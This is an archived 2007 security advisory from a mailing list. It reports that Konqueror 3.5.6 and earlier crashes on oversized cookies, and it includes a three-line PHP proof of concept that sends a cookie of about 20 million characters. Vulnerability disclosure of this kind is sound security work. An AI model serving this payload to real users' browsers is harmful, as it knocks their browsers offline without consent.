Konqueror Remote Denial Of Service Nov 14 2007 03:33PM
laurent gaffie gmail com
Application: Konqueror <= 3.5.6

Web Site: http://www.konqueror.org/

Platform: Unix

Bug: Remote Denial of service

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========

"Konqueror is an Open Source web browser with HTML 4.01 compliance, supporting Java applets, JavaScript, CSS 1, CSS 2.1, as well as Netscape plugins (for example, Flash or RealVideo plugins)."

======

2) Bug

======

Konqueror doesn't handle big cookies, so when a big cookie is sended , konqueror will crash.

=====

3)Proof of concept

=====

Proof of concept example :

<?php

ini_set("memory_limit","200M");

setcookie("hi_fox", str_repeat("A",19999999));

?>

========

4)Greets

========

Berga,team soh, #futurezone, #soh

=====

5)Credits

=====

laurent gaffié

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus